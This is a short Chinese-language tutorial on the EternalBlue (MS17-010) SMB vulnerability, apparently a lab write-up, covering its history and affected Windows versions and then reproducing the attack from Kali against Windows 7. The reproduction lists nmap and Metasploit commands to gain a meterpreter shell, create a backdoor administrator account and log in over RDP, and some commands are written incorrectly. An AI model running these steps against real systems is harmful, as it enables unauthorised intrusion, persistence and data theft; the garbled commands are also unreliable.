一,认识永恒之蓝
1,简介
永恒之蓝,代号MS17-010。爆发于2017年,其通过控制用户主机,利用SMB协议的漏洞来获取系统的最高权限,进而可以窃取信息,偷窥隐私,甚至使系统瘫痪。曾爆发覆盖100多个国家,通过植入勒索病毒,用户只要开机上网,就会被控制。全世界因此遭受了巨大的经济损失。
2,原理
永恒之蓝基于SMB协议的漏洞,通过恶意扫描开放TCP445和135文件共享端口的主机来进行病毒植入攻击
3,影响范围
目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0
二,漏洞复现
1,复现环境:
攻击机: Kali
靶 机: Windows 7 (开放445端口和远程3389端口)
2,复现过程
(1)扫描发现开放445端口:nmap 目标IP
(2)扫描得知445开放,使用MSF攻击模块:msfconsole
(3)导入永恒之蓝病毒:search ms17-010 0.1为攻击模块 , 2.3为扫描模块
(4)先扫后功,使用模块--针对目标--运行:use 模块
set rhosts 目标IP
run
(5)导入攻击模块 和上面一样操作
(7)攻击完成后进入到了目标主机的meterpreter控制通道,输入shell进入Windows的CMD。进入后是乱码 使用chcp 65001命令修复即可
(8)然后通过CMD创建一个用户并放至管理员组:set user 用户名 密码 /add
net localgroup administrator 用户名 /add
(9)这时回到kali的操作命令行,远程登录自己创建的用户。登录后可以修改原用户密码,甚至删除,窃取信息等操作。
:rdesktop IP:3389
